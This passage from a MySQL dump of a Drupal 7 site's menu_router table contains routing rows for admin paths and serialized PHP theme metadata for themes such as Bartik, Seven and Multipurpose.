COMMENT 'The title for the current page, or the title for the tab if this is a local task.', `title_callback` varchar(255) NOT NULL DEFAULT '' COMMENT 'A function which will alter the title. Defaults to t()', `title_arguments` varchar(255) NOT NULL DEFAULT '' COMMENT 'A serialized array of arguments for the title callback. If empty, the title will be used as the sole argument for the title callback.', `theme_callback` varchar(255) NOT NULL DEFAULT '' COMMENT 'A function which returns the name of the theme that will be used to render this page. If left empty, the default theme will be used.', `theme_arguments` varchar(255) NOT NULL DEFAULT '' COMMENT 'A serialized array of arguments for the theme callback.', `type` int(11) NOT NULL DEFAULT '0' COMMENT 'Numeric representation of the type of the menu item, like MENU_LOCAL_TASK.', `description` text NOT NULL COMMENT 'A description of this item.', `position` varchar(255) NOT NULL DEFAULT '' COMMENT 'The position of the block (left or right) on the system administration page for this item.', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'Weight of the element. Lighter weights are higher up, heavier weights go down.', `include_file` mediumtext COMMENT 'The file to include for this element, usually the page callback function lives in this file.', PRIMARY KEY (`path`), KEY `fit` (`fit`), KEY `tab_parent` (`tab_parent`(64),`weight`,`title`), KEY `tab_root_weight_title` (`tab_root`(64),`weight`,`title`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Maps paths to various callbacks (access, page and title)'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `menu_router` -- LOCK TABLES `menu_router` WRITE; /*!40000 ALTER TABLE `menu_router` DISABLE KEYS */; INSERT INTO `menu_router` VALUES ('.','','','1','a:0:{}','_adsense_cse_results','a:0:{}','',1,1,0,'','.','Search Results','t','','','a:0:{}',0,'','',0,'sites/all/modules/adsense/cse/adsense_cse.results.inc'),('admin','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',1,1,0,'','admin','Administration','t','','','a:0:{}',6,'','',9,'modules/system/system.admin.inc'),('admin/appearance','','','user_access','a:1:{i:0;s:17:\"administer themes\";}','system_themes_page','a:0:{}','',3,2,0,'','admin/appearance','Appearance','t','','','a:0:{}',6,'Select and configure your themes.','left',-6,'modules/system/system.admin.inc'),('admin/appearance/default','','','user_access','a:1:{i:0;s:17:\"administer themes\";}','system_theme_default','a:0:{}','',7,3,0,'','admin/appearance/default','Set default theme','t','','','a:0:{}',0,'','',0,'modules/system/system.admin.inc'),('admin/appearance/disable','','','user_access','a:1:{i:0;s:17:\"administer themes\";}','system_theme_disable','a:0:{}','',7,3,0,'','admin/appearance/disable','Disable theme','t','','','a:0:{}',0,'','',0,'modules/system/system.admin.inc'),('admin/appearance/enable','','','user_access','a:1:{i:0;s:17:\"administer themes\";}','system_theme_enable','a:0:{}','',7,3,0,'','admin/appearance/enable','Enable theme','t','','','a:0:{}',0,'','',0,'modules/system/system.admin.inc'),('admin/appearance/install','','','update_manager_access','a:0:{}','drupal_get_form','a:2:{i:0;s:27:\"update_manager_install_form\";i:1;s:5:\"theme\";}','',7,3,1,'admin/appearance','admin/appearance','Install new theme','t','','','a:0:{}',388,'','',25,'modules/update/update.manager.inc'),('admin/appearance/list','','','user_access','a:1:{i:0;s:17:\"administer themes\";}','system_themes_page','a:0:{}','',7,3,1,'admin/appearance','admin/appearance','List','t','','','a:0:{}',140,'Select and configure your theme','',-1,'modules/system/system.admin.inc'),('admin/appearance/settings','','','user_access','a:1:{i:0;s:17:\"administer themes\";}','drupal_get_form','a:1:{i:0;s:21:\"system_theme_settings\";}','',7,3,1,'admin/appearance','admin/appearance','Settings','t','','','a:0:{}',132,'Configure default and theme specific settings.','',20,'modules/system/system.admin.inc'),('admin/appearance/settings/bartik','','','_system_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:25:\"themes/bartik/bartik.info\";s:4:\"name\";s:6:\"bartik\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:6:\"Bartik\";s:11:\"description\";s:48:\"A flexible, recolorable theme with many regions.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.40\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:28:\"themes/bartik/css/layout.css\";s:13:\"css/style.css\";s:27:\"themes/bartik/css/style.css\";s:14:\"css/colors.css\";s:28:\"themes/bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:27:\"themes/bartik/css/print.css\";}}s:7:\"regions\";a:20:{s:6:\"header\";s:6:\"Header\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:11:\"highlighted\";s:11:\"Highlighted\";s:8:\"featured\";s:8:\"Featured\";s:7:\"content\";s:7:\"Content\";s:13:\"sidebar_first\";s:13:\"Sidebar first\";s:14:\"sidebar_second\";s:14:\"Sidebar second\";s:14:\"triptych_first\";s:14:\"Triptych first\";s:15:\"triptych_middle\";s:15:\"Triptych middle\";s:13:\"triptych_last\";s:13:\"Triptych last\";s:18:\"footer_firstcolumn\";s:19:\"Footer first column\";s:19:\"footer_secondcolumn\";s:20:\"Footer second column\";s:18:\"footer_thirdcolumn\";s:19:\"Footer third column\";s:19:\"footer_fourthcolumn\";s:20:\"Footer fourth column\";s:6:\"footer\";s:6:\"Footer\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"0\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1444866674\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:28:\"themes/bartik/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1444866674;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:28:\"themes/bartik/css/layout.css\";s:13:\"css/style.css\";s:27:\"themes/bartik/css/style.css\";s:14:\"css/colors.css\";s:28:\"themes/bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:27:\"themes/bartik/css/print.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','drupal_get_form','a:2:{i:0;s:21:\"system_theme_settings\";i:1;s:6:\"bartik\";}','',15,4,1,'admin/appearance/settings','admin/appearance','Bartik','t','','','a:0:{}',132,'','',0,'modules/system/system.admin.inc'),('admin/appearance/settings/garland','','','_system_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:27:\"themes/garland/garland.info\";s:4:\"name\";s:7:\"garland\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:7:\"Garland\";s:11:\"description\";s:111:\"A multi-column theme which can be configured to modify colors and switch between fixed and fluid width layouts.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.40\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:1:{s:9:\"style.css\";s:24:\"themes/garland/style.css\";}s:5:\"print\";a:1:{s:9:\"print.css\";s:24:\"themes/garland/print.css\";}}s:8:\"settings\";a:1:{s:13:\"garland_width\";s:5:\"fluid\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1444866674\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:29:\"themes/garland/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1444866674;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:1:{s:9:\"style.css\";s:24:\"themes/garland/style.css\";}s:5:\"print\";a:1:{s:9:\"print.css\";s:24:\"themes/garland/print.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','drupal_get_form','a:2:{i:0;s:21:\"system_theme_settings\";i:1;s:7:\"garland\";}','',15,4,1,'admin/appearance/settings','admin/appearance','Garland','t','','','a:0:{}',132,'','',0,'modules/system/system.admin.inc'),('admin/appearance/settings/global','','','user_access','a:1:{i:0;s:17:\"administer themes\";}','drupal_get_form','a:1:{i:0;s:21:\"system_theme_settings\";}','',15,4,1,'admin/appearance/settings','admin/appearance','Global settings','t','','','a:0:{}',140,'','',-1,'modules/system/system.admin.inc'),('admin/appearance/settings/multipurpose','','','_system_themes_access','a:1:{i:0;O:8:\"stdClass\":13:{s:8:\"filename\";s:47:\"sites/all/themes/multipurpose/multipurpose.info\";s:4:\"name\";s:12:\"multipurpose\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:18:{s:4:\"name\";s:18:\"Multipurpose Theme\";s:11:\"description\";s:112:\"Multipurpose Theme is a premium Drupal 7 theme. Developed by Devsaran.com.\";s:4:\"core\";s:3:\"7.x\";s:6:\"engine\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:2:{s:9:\"style.css\";s:39:\"sites/all/themes/multipurpose/style.css\";s:18:\"css/responsive.css\";s:48:\"sites/all/themes/multipurpose/css/responsive.css\";}}s:7:\"scripts\";a:3:{s:12:\"js/retina.js\";s:42:\"sites/all/themes/multipurpose/js/retina.js\";s:13:\"js/plugins.js\";s:43:\"sites/all/themes/multipurpose/js/plugins.js\";s:12:\"js/global.js\";s:42:\"sites/all/themes/multipurpose/js/global.js\";}s:7:\"regions\";a:15:{s:13:\"sidebar_first\";s:13:\"First Sidebar\";s:6:\"header\";s:6:\"Header\";s:13:\"preface_first\";s:13:\"Preface First\";s:14:\"preface_middle\";s:14:\"Preface Middle\";s:12:\"preface_last\";s:12:\"Preface Last\";s:11:\"content_top\";s:11:\"Content Top\";s:7:\"content\";s:7:\"Content\";s:4:\"help\";s:4:\"Help\";s:6:\"footer\";s:6:\"Footer\";s:12:\"footer_first\";s:12:\"First Bottom\";s:13:\"footer_second\";s:13:\"Second Bottom\";s:12:\"footer_third\";s:12:\"Third Bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:4:\"name\";i:2;s:6:\"slogan\";i:3;s:17:\"node_user_picture\";i:4;s:20:\"comment_user_picture\";i:5;s:25:\"comment_user_verification\";i:6;s:7:\"favicon\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:8:\"settings\";a:8:{s:17:\"slideshow_display\";s:1:\"1\";s:11:\"breadcrumbs\";s:1:\"1\";s:10:\"image_logo\";s:1:\"0\";s:18:\"socialicon_display\";s:1:\"1\";s:12:\"facebook_url\";s:39:\"http://www.facebook.com/devsaran.drupal\";s:11:\"twitter_url\";s:34:\"http://www.twitter.com/saranquardz\";s:15:\"google_plus_url\";s:49:\"https://plus.google.com/u/0/109064032428497406718\";s:13:\"pinterest_url\";s:20:\"http://pinterest.com\";}s:7:\"version\";s:7:\"7.x-1.0\";s:7:\"project\";s:12:\"multipurpose\";s:9:\"datestamp\";s:10:\"1409600329\";s:10:\"screenshot\";s:44:\"sites/all/themes/multipurpose/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:5:\"mtime\";i:1434659475;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:2:{s:9:\"style.css\";s:39:\"sites/all/themes/multipurpose/style.css\";s:18:\"css/responsive.css\";s:48:\"sites/all/themes/multipurpose/css/responsive.css\";}}s:7:\"scripts\";a:3:{s:12:\"js/retina.js\";s:42:\"sites/all/themes/multipurpose/js/retina.js\";s:13:\"js/plugins.js\";s:43:\"sites/all/themes/multipurpose/js/plugins.js\";s:12:\"js/global.js\";s:42:\"sites/all/themes/multipurpose/js/global.js\";}s:6:\"engine\";s:11:\"phptemplate\";}}','drupal_get_form','a:2:{i:0;s:21:\"system_theme_settings\";i:1;s:12:\"multipurpose\";}','',15,4,1,'admin/appearance/settings','admin/appearance','Multipurpose Theme','t','','','a:0:{}',132,'','',0,'modules/system/system.admin.inc'),('admin/appearance/settings/responsive_bartik','','','_system_themes_access','a:1:{i:0;O:8:\"stdClass\":13:{s:8:\"filename\";s:57:\"sites/all/themes/responsive_bartik/responsive_bartik.info\";s:4:\"name\";s:17:\"responsive_bartik\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:18:{s:4:\"name\";s:17:\"Responsive Bartik\";s:11:\"description\";s:86:\"A flexible, recolorable theme with many regions and a responsive, mobile-first layout.\";s:7:\"version\";s:7:\"7.x-1.0\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:49:\"sites/all/themes/responsive_bartik/css/layout.css\";s:13:\"css/style.css\";s:48:\"sites/all/themes/responsive_bartik/css/style.css\";s:14:\"css/colors.css\";s:49:\"sites/all/themes/responsive_bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:48:\"sites/all/themes/responsive_bartik/css/print.css\";}}s:7:\"scripts\";a:1:{s:22:\"js/collapsible-menu.js\";s:57:\"sites/all/themes/responsive_bartik/js/collapsible-menu.js\";}s:7:\"regions\";a:20:{s:6:\"header\";s:6:\"Header\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:11:\"highlighted\";s:11:\"Highlighted\";s:8:\"featured\";s:8:\"Featured\";s:7:\"content\";s:7:\"Content\";s:13:\"sidebar_first\";s:13:\"Sidebar first\";s:14:\"sidebar_second\";s:14:\"Sidebar second\";s:14:\"triptych_first\";s:14:\"Triptych first\";s:15:\"triptych_middle\";s:15:\"Triptych middle\";s:13:\"triptych_last\";s:13:\"Triptych last\";s:18:\"footer_firstcolumn\";s:19:\"Footer first column\";s:19:\"footer_secondcolumn\";s:20:\"Footer second column\";s:18:\"footer_thirdcolumn\";s:19:\"Footer third column\";s:19:\"footer_fourthcolumn\";s:20:\"Footer fourth column\";s:6:\"footer\";s:6:\"Footer\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"0\";}s:7:\"project\";s:17:\"responsive_bartik\";s:9:\"datestamp\";s:10:\"1413392482\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:49:\"sites/all/themes/responsive_bartik/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:5:\"mtime\";i:1434659475;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:49:\"sites/all/themes/responsive_bartik/css/layout.css\";s:13:\"css/style.css\";s:48:\"sites/all/themes/responsive_bartik/css/style.css\";s:14:\"css/colors.css\";s:49:\"sites/all/themes/responsive_bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:48:\"sites/all/themes/responsive_bartik/css/print.css\";}}s:7:\"scripts\";a:1:{s:22:\"js/collapsible-menu.js\";s:57:\"sites/all/themes/responsive_bartik/js/collapsible-menu.js\";}s:6:\"engine\";s:11:\"phptemplate\";}}','drupal_get_form','a:2:{i:0;s:21:\"system_theme_settings\";i:1;s:17:\"responsive_bartik\";}','',15,4,1,'admin/appearance/settings','admin/appearance','Responsive Bartik','t','','','a:0:{}',132,'','',0,'modules/system/system.admin.inc'),('admin/appearance/settings/seven','','','_system_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:23:\"themes/seven/seven.info\";s:4:\"name\";s:5:\"seven\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:5:\"Seven\";s:11:\"description\";s:65:\"A simple one-column, tableless, fluid width administration theme.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.40\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:6:\"screen\";a:2:{s:9:\"reset.css\";s:22:\"themes/seven/reset.css\";s:9:\"style.css\";s:22:\"themes/seven/style.css\";}}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"1\";}s:7:\"regions\";a:8:{s:7:\"content\";s:7:\"Content\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:13:\"sidebar_first\";s:13:\"First sidebar\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:14:\"regions_hidden\";a:3:{i:0;s:13:\"sidebar_first\";i:1;s:8:\"page_top\";i:2;s:11:\"page_bottom\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1444866674\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/seven/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1444866674;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:6:\"screen\";a:2:{s:9:\"reset.css\";s:22:\"themes/seven/reset.css\";s:9:\"style.css\";s:22:\"themes/seven/style.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','drupal_get_form','a:2:{i:0;s:21:\"system_theme_settings\";i:1;s:5:\"seven\";}','',15,4,1,'admin/appearance/settings','admin/appearance','Seven','t','','','a:0:{}',132,'','',0,'modules/system/system.admin.inc'),('admin/appearance/settings/stark','','','_system_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:23:\"themes/stark/stark.info\";s:4:\"name\";s:5:\"stark\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:18:{s:4:\"name\";s:5:\"Stark\";s:11:\"description\";s:208:\"This theme demonstrates Drupal\'s default HTML markup and CSS styles. To learn how to build your own theme and override Drupal\'s default code, see the Theming Guide.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.40\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"layout.css\";s:23:\"themes/stark/layout.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1444866674\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/stark/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1444866674;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"layout.css\";s:23:\"themes/stark/layout.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','drupal_get_form','a:2:{i:0;s:21:\"system_theme_settings\";i:1;s:5:\"stark\";}','',15,4,1,'admin/appearance/settings','admin/appearance','Stark','t','','','a:0:{}',132,'','',0,'modules/system/system.admin.inc'),('admin/appearance/update','','','update_manager_access','a:0:{}','drupal_get_form','a:2:{i:0;s:26:\"update_manager_update_form\";i:1;s:5:\"theme\";}','',7,3,1,'admin/appearance','admin/appearance','Update','t','','','a:0:{}',132,'','',10,'modules/update/update.manager.inc'),('admin/compact','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_compact_page','a:0:{}','',3,2,0,'','admin/compact','Compact mode','t','','','a:0:{}',0,'','',0,'modules/system/system.admin.inc'),('admin/config','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_config_page','a:0:{}','',3,2,0,'','admin/config','Configuration','t','','','a:0:{}',6,'Administer settings.','',0,'modules/system/system.admin.inc'),('admin/config/content','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',7,3,0,'','admin/config/content','Content authoring','t','','','a:0:{}',6,'Settings related to formatting and authoring content.','left',-15,'modules/system/system.admin.inc'),('admin/config/content/formats','','','user_access','a:1:{i:0;s:18:\"administer filters\";}','drupal_get_form','a:1:{i:0;s:21:\"filter_admin_overview\";}','',15,4,0,'','admin/config/content/formats','Text formats','t','','','a:0:{}',6,'Configure how content input by users is filtered, including allowed HTML tags. Also allows enabling of module-provided filters.','',0,'modules/filter/filter.admin.inc'),('admin/config/content/formats/%','a:1:{i:4;s:18:\"filter_format_load\";}','','user_access','a:1:{i:0;s:18:\"administer filters\";}','filter_admin_format_page','a:1:{i:0;i:4;}','',30,5,0,'','admin/config/content/formats/%','','filter_admin_format_title','a:1:{i:0;i:4;}','','a:0:{}',6,'','',0,'modules/filter/filter.admin.inc'),('admin/config/content/formats/%/disable','a:1:{i:4;s:18:\"filter_format_load\";}','','_filter_disable_format_access','a:1:{i:0;i:4;}','drupal_get_form','a:2:{i:0;s:20:\"filter_admin_disable\";i:1;i:4;}','',61,6,0,'','admin/config/content/formats/%/disable','Disable text format','t','','','a:0:{}',6,'','',0,'modules/filter/filter.admin.inc'),('admin/config/content/formats/add','','','user_access','a:1:{i:0;s:18:\"administer filters\";}','filter_admin_format_page','a:0:{}','',31,5,1,'admin/config/content/formats','admin/config/content/formats','Add text format','t','','','a:0:{}',388,'','',1,'modules/filter/filter.admin.inc'),('admin/config/content/formats/list','','','user_access','a:1:{i:0;s:18:\"administer filters\";}','drupal_get_form','a:1:{i:0;s:21:\"filter_admin_overview\";}','',31,5,1,'admin/config/content/formats','admin/config/content/formats','List','t','','','a:0:{}',140,'','',0,'modules/filter/filter.admin.inc'),('admin/config/development','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',7,3,0,'','admin/config/development','Development','t','','','a:0:{}',6,'Development tools.','right',-10,'modules/system/system.admin.inc'),('admin/config/development/logging','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:23:\"system_logging_settings\";}','',15,4,0,'','admin/config/development/logging','Logging and errors','t','','','a:0:{}',6,'Settings for logging and alerts modules. Various modules can route Drupal\'s system events to different destinations, such as syslog, database, email, etc.','',-15,'modules/system/system.admin.inc'),('admin/config/development/maintenance','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:28:\"system_site_maintenance_mode\";}','',15,4,0,'','admin/config/development/maintenance','Maintenance mode','t','','','a:0:{}',6,'Take the site offline for maintenance or bring it back online.','',-10,'modules/system/system.admin.inc'),('admin/config/development/performance','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:27:\"system_performance_settings\";}','',15,4,0,'','admin/config/development/performance','Performance','t','','','a:0:{}',6,'Enable or disable page caching for anonymous users and set CSS and JS bandwidth optimization 